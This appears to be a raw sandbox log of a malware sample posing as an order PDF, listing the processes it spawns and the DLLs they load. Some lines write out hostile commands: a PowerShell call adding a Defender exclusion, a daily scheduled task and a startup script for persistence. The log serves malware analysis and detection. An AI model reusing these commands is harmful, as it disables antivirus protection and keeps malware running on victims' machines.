Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user\AppData\Local\Temp\TrojanAI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user\AppData\Local\Temp\server02.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp32A9.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user\AppData\Local\Temp\TrojanAI.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user\AppData\Local\Temp\TrojanAI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user\AppData\Local\Temp\server02.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp32A9.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user\AppData\Local\Temp\TrojanAI.exe"

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: sppc.dll
